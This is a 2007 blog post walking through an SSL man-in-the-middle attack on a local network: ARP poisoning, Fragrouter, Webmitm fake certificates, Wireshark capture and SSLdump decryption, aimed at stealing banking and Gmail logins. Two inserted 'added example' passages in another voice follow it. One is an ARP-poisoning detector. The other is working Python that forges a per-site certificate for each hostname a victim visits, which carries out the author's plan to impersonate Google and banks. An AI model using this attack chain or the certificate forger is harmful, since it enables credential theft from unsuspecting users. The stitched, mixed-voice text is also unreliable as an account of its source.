
SSL is Broken Over Here

Hey hey hey! I use online banking, but it's okay because I make sure to look for the 's' in https!

Virtually my entire life is recorded in Gmail, but it's okay because the authentication uses SSL!

SSL will save us all!

Except... not. It actually took me a few days the first time, but now I could plug a computer into your local network and read all your SSL traffic in a matter of minutes. If I can get upstream of you (anywhere on the path between you and the site), it's even easier.

When you go to your bank, your browser sees my SSL certificate, not the bank's. You click through the warning and accept it, and from then on you are talking to me. I open my own SSL connection to the bank, relay everything you say on to it, and say back to you whatever the bank said to me. You never know the difference, and I know your username and password.

It takes a handful of programs, but most of them come precompiled on the BackTrack 2 Live CD. The few days it took me were spent learning how to modify the Live CD and tracking down the software I needed for the last few steps. Here's the quick rundown:

====================

1. ARP cache poisoning -- tricks your computer into sending everything meant for the router to my MAC address instead, so I become your router. I don't even need this step if I can get upstream of you (which is better for me, because a careful person can detect the poisoning: the router's entry in arp -a suddenly shows my MAC address, and since I forward packets as a router, my box can also turn up as an extra hop in a traceroute)

2. Fragrouter -- sets my machine up to act as a router, forwarding everything it receives from you on to its intended destination, so your connections keep working and you notice nothing

3. Webmitm -- generates a fake SSL certificate and presents it to your browser when you try to go to a real SSL-secured site (this is the other major weakness of this implementation -- I can only configure one cert, and it is self-signed and can't carry the name of every site you visit, so your browser shows a popup warning that the certificate is untrusted and its name doesn't match; if you carefully read those warnings, you'll be alerted here) (but, realistically, who reads those warnings?)

4. Wireshark -- the renamed successor to Ethereal, this grabs all the traffic that passes through my computer (which, of course, now includes all your traffic, still encrypted, but encrypted under a session key negotiated with MY certificate and private key)

5. SSLdump -- given my private key, decrypts all of your "secure" traffic from the capture, sucker. (This works because your browser encrypts the session secret to the public key in my certificate, the plain RSA key exchange; with an ephemeral Diffie-Hellman cipher suite the private key alone would not decrypt a capture.)

====================
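The parenthetical in step 1 says a careful person can spot the ARP poisoning. Here is what that check looks like in practice, as an added example (my code, not the author's and not part of dsniff or BackTrack): it parses the victim's own ARP table, as printed by arp -an on Linux/BSD or arp -a on Windows, and flags the two classic signs of arpspoof at work: the router's IP now resolving to a different MAC than the one you saw before, and one MAC address claiming more than one IP. The two tables below are constructed sample output, and the gateway address and MACs are assumptions.

```python
"""Detect ARP cache poisoning from the victim's own ARP table (added example).

Parses `arp -an` (Linux/BSD) or `arp -a` (Windows) output and reports the signs
of a poisoned cache.  The sample tables are constructed; nothing here is real.
"""
import re
from collections import defaultdict

# Matches both "? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0" (Linux/BSD)
# and "  192.168.1.1          00-11-22-33-44-55     dynamic" (Windows).
ARP_LINE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?\s+(?:at\s+)?"
    r"(?P<mac>(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed sample: a clean table, then the same host after arpspoof has run.
GATEWAY_IP = "192.168.1.1"            # assumption: the LAN's real router
GATEWAY_MAC = "00:11:22:33:44:55"     # assumption: its MAC, noted on a good day
ATTACKER_MAC = "de:ad:be:ef:00:01"    # assumption: the attacker's MAC

CLEAN_ARP = """\
? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0
? (192.168.1.50) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.7) at <incomplete> on eth0
"""

POISONED_ARP = """\
? (192.168.1.1) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.50) at de:ad:be:ef:00:01 [ether] on eth0
? (192.168.1.7) at <incomplete> on eth0
"""


def parse_arp(output):
    """Return {ip: mac} from arp output; MACs are normalised to lower-case colons.

    Incomplete entries and header lines do not match the pattern and are skipped.
    """
    table = {}
    for line in output.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower().replace("-", ":")
    return table


def find_poisoning(table, gateway_ip, known_gateway_mac=None):
    """Return a list of findings (empty list = nothing suspicious).

    Two checks: the gateway's MAC differs from the known-good one, and a single
    MAC answers for several IPs (the attacker's real entry plus the spoofed one).
    """
    findings = []
    gw_mac = table.get(gateway_ip)
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append("gateway %s now maps to %s, expected %s"
                        % (gateway_ip, gw_mac, known_gateway_mac.lower()))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append("MAC %s claims %d addresses: %s"
                            % (mac, len(ips), ", ".join(sorted(ips))))
    return findings


def check_sample():
    """Run both checks over the constructed tables; returns (clean, poisoned) findings."""
    clean = find_poisoning(parse_arp(CLEAN_ARP), GATEWAY_IP, GATEWAY_MAC)
    poisoned = find_poisoning(parse_arp(POISONED_ARP), GATEWAY_IP, GATEWAY_MAC)
    return clean, poisoned


if __name__ == "__main__":
    clean, poisoned = check_sample()
    print("clean table:", clean or "nothing suspicious")
    print("after arpspoof:")
    for f in poisoned:
        print("  -", f)
```

The gateway-MAC check needs a baseline, so note the router's MAC once while you trust the network. The duplicate-MAC check needs no baseline and is the one worth running first, since arpspoof leaves the attacker's own entry in your table next to the one it forged. Neither check helps when the attacker is upstream of you, as the post says: nothing on your LAN changes in that case.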

I'd like to improve this attack by writing a modification of webmitm that lets me configure, or automatically generate, multiple fake certificates and present them based on the destination host. So when you go to Google, you'll see my fake Google cert. Go to your bank and see my fake bank cert. Odds of you ever realizing what's happening = fairly small. (Where you = average yokel, not the undoubtedly brilliant and web-savvy readers of my blog.)
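The per-destination certificate generation described above, as an added example that is not the author's code and not part of dsniff or webmitm. It uses the third-party cryptography package (assumed installed): a throwaway CA is generated once, and each hostname the browser asks for gets a leaf certificate carrying that name, minted on first use, signed by the CA and cached for the next connection. The hostnames in the usage are assumptions.

```python
"""Per-destination fake certificates for an SSL MITM proxy (added example).

One throwaway CA signs a leaf cert per hostname; leaves are cached so a site
is forged once and reused.  Requires the `cryptography` package.
"""
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.x509.oid import NameOID


def _validity():
    """Yesterday through one year from now, so clock skew never makes it invalid."""
    now = datetime.datetime.now(datetime.timezone.utc)
    return now - datetime.timedelta(days=1), now + datetime.timedelta(days=365)


def make_ca(common_name="demo mitm CA"):
    """Self-signed CA key and cert.  Nothing trusts it, which is why browsers still warn."""
    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, common_name)])
    not_before, not_after = _validity()
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(not_before)
        .not_valid_after(not_after)
        .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
        .sign(key, hashes.SHA256())
    )
    return key, cert


class CertForger:
    """Mints and caches one leaf certificate per destination hostname."""

    def __init__(self, ca_key, ca_cert):
        self.ca_key = ca_key
        self.ca_cert = ca_cert
        self._cache = {}

    def cert_for(self, hostname):
        """Return (leaf_key, leaf_cert) for hostname, generating it on first use."""
        hostname = hostname.strip().lower()
        if hostname in self._cache:
            return self._cache[hostname]
        key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
        not_before, not_after = _validity()
        cert = (
            x509.CertificateBuilder()
            .subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, hostname)]))
            .issuer_name(self.ca_cert.subject)
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(not_before)
            .not_valid_after(not_after)
            # Browsers match the site name against the SAN, not just the CN.
            .add_extension(x509.SubjectAlternativeName([x509.DNSName(hostname)]), critical=False)
            .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
            .sign(self.ca_key, hashes.SHA256())
        )
        self._cache[hostname] = (key, cert)
        return key, cert


def subject_cn(cert):
    """The CN the victim's browser would display for this certificate."""
    return cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value


def san_names(cert):
    """DNS names listed in the certificate's SubjectAlternativeName."""
    ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
    return ext.value.get_values_for_type(x509.DNSName)


def issued_by(cert, ca_cert):
    """True if cert's signature verifies under the CA's public key."""
    try:
        ca_cert.public_key().verify(
            cert.signature, cert.tbs_certificate_bytes,
            padding.PKCS1v15(), cert.signature_hash_algorithm,
        )
        return True
    except Exception:
        return False


if __name__ == "__main__":
    ca_key, ca_cert = make_ca()
    forger = CertForger(ca_key, ca_cert)
    for host in ("www.google.com", "online.examplebank.com"):  # assumed hostnames
        _, leaf = forger.cert_for(host)
        print(subject_cn(leaf), san_names(leaf), issued_by(leaf, ca_cert))
```

In a live proxy the cert_for lookup sits where the server name becomes known: the SNI extension of the ClientHello, or the Host header on a plain CONNECT. Two caveats worth stating plainly. The name on the certificate now matches, but the issuer is still a CA the browser has never heard of, so the untrusted-issuer warning remains; the improvement only removes the more alarming name-mismatch half of it. And minting a 2048-bit RSA key per site takes a fraction of a second, which is why the cache matters on a busy victim.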

So, next time you're having a friendly argument with some coworkers about how weak SSL is and whether it's purely theoretical or could actually, practically be broken, you don't have to do all this work -- just point them to my blog. Because I'm compulsively ridiculous about things like this.


About

This page contains a single entry from the blog posted on August 18, 2007 6:56 AM.

The previous post in this blog was I Hate Microsoft: Reason 458.

The next post in this blog is SEO and Self Promotion.
